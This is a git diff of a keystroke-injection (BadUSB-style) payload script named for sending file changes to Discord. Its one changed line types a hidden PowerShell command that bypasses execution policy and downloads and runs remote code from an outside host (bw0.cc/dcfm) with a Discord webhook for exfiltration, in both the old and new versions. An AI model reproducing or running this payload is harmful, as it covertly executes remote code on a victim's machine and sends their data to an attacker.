diff --git a/File-Monitor-to-Discord/File-Changes-to-Discord.txt b/File-Monitor-to-Discord/File-Changes-to-Discord.txt index 418e0b0..615336a 100644 --- a/File-Monitor-to-Discord/File-Changes-to-Discord.txt +++ b/File-Monitor-to-Discord/File-Changes-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/dcfm | iex +STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcfm) ENTER